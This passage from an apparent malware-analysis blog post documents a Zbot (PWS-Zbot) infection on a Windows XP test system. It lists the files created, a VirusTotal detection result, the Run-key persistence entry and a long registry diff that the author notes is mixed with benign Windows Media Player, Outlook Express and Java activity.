<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:19 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">18KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\RUNDLL32.EXE-1EDA2CF6.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">22KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:47 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\SETUP_WM.EXE-3135CBD6.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">34KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:43 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">20KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:17 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">53KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:58 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WMPLAYER.EXE-18DDEF9C.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">59KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\d3d9caps.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wmpns.dll</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">222KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4/14/2008 8:00:00 AM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<br />
The cookies were not created as part of the infection. One was from MSN.com (opens by default in Windows XP), one was from URLquery.net, one by a redirected site which was my first attempt at infection and the other was unrelated.<br />
<br />
The files C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 and C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 were in "use" once the system was compromised, indicating it was being used by the application.These files are created by java's temporary needs and I have seen them on quite a few systems that were infected. More often, however, I have seen the folder hsperfdata_%username% empty post infection.<br />
<br />
myzyn.exe is recognized as PWS-Zbot.<br />
<span style="background-color: white;"><br /></span>
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 8px; margin-left: 8px; max-width: 100%; text-align: start;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">myzyn.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class=" text-red " style="color: #b40c1a; padding: 8px 10px 9px;">28 / 43</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2012-09-22 17:42:05 UTC ( 43 minutes ago )</td></tr>
</tbody></table>
<span style="background-color: white;"><br /></span>
<br />
<div style="text-align: left;">
<a href="https://www.virustotal.com/file/0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199/analysis/1348335725/">https://www.virustotal.com/file/0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199/analysis/1348335725/</a>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Now Onto the Registry</span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div style="text-align: left;">
Persistence was established through HKCU\Software\Microsoft\Windows\CurrentVersion\Run, nothing special here.</div>
<div style="text-align: left;">
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%px;"><tbody>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></td><td><span style="color: black; font-size: xx-small;">Orimdie</span></td><td></td><td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<span style="font-size: large;"><br /></span></div>
Here is the full dump of the registry changes, which admittedly is contaminated by some Windows XP legitimate activity surrounding these first launch of some programs like Windows Media Player and my download of Java from oldversion.com - which was unexpected.. I will use the lessons learned here in future studies.<br />
<br />
<br />
<br />
<br />
<b>backhole1 - Registry</b><br />
<br />
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%px;">
<tbody>
<tr>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Key</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Value</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Data Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Data After</span></th>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">ThreadingModel</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Apartment"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand.1"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"IWMPDeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">Version</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{cd3afa96-b84f-48f0-9393-7edc34128127}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMPDeskBand 1.0 Type Library"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">VerStamp</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpellDontIgnoreDBCS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">MSIMN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">StoreMigratedV5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">ConvertedToDBX</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Settings Upgraded</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Running</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Store Root</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerDlgPos</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerTack</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Compact Check Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Welcome Message</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Secure Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Default_CodePage</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00006faf</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonShown</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateBeginTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:08 GMT"</span></td>
</tr>
